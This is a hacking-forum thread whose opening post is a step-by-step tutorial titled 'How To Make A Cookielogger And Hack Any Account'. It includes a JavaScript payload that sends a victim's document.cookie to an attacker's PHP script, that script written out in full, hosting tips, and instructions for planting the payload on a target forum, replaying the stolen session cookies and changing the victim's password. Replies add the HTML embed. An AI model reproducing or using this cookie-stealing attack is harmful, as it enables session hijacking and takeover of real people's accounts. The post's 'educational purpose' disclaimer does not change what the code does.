prodil89 Posted September 28, 2009 Report Posted September 28, 2009 How To Make A Cookielogger And Hack Any AccountCookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Google, Yahoo, Orkut, Facebook, Flickr etc.What is a CookieLogger?A CookieLogger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.Today I am going to show How to make your own Cookie Logger…Hope you will enjoy Reading it …Step 1: Save the notepad file from the link below and Rename it as Fun.gif: <script>location.href='http://www.yoursite.com/cookielogger.php?cookie='+escape(document.cookie)</SCRIPT> Step 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php:$filename = “logfile.txt”;if (isset($_GET["cookie"])){if (!$handle = fopen($filename, ‘a’)){echo “Temporary Server Error,Sorry for the inconvenience.”;exit;}else{if (fwrite($handle, “\r\n” . $_GET["cookie"]) === FALSE){echo “Temporary Server Error,Sorry for the inconvenience.”;exit;}}echo “Temporary Server Error,Sorry for the inconvenience.”;fclose($handle);exit;}echo “Temporary Server Error,Sorry for the inconvenience.”;exit;?>Step 3: Create a new Notepad File and Save it as logfile.txtStep 4: Upload this file to your servercookielogger.php -> [url]http://www.yoursite.com/cookielogger.php[/url]logfile.txt -> [url]http://www.yoursite.com/logfile.txt[/url] (chmod 777)fun.gif -> [url]http://www.yoursite.com/fun.gif[/url]If you don’t have any Website then you can use the following Website to get a Free Website which has php support :[url=http://0fees.net]Free Web Hosting - PHP, MySQL, FTP, Email[/url]Step 5: Go to the victim forum and insert this code in the signature or a post :Download it here.Step 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologini d%22%3Bs%3A0%3A%22%22%3Bs%3A6% ?3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9Step 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.Step 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.Note: Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.Disclaimer: I don’t take Responsibility for what you do with this script, served for Educational purpose only Quote
pgmleroxor Posted October 31, 2009 Report Posted October 31, 2009 Step 5: Go to the victim forum and insert this code in the signature or a post :Download it here.???I don't understand Quote
cla1992 Posted January 1, 2010 Report Posted January 1, 2010 (edited) ???I don't understandThis is the code, download it from here.:http://w14.easy-share.com/1702516964.html Edited January 1, 2010 by cla1992 Quote
ZeroCold Posted January 1, 2010 Report Posted January 1, 2010 Copy/paste, pune-l calumea sau pune sursa...te rog Quote
cla1992 Posted January 1, 2010 Report Posted January 1, 2010 Copy/paste, pune-l calumea sau pune sursa...te rogUite: <a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a> Quote
A25414N Posted January 16, 2011 Report Posted January 16, 2011 but how we can know what website has victim visited? Quote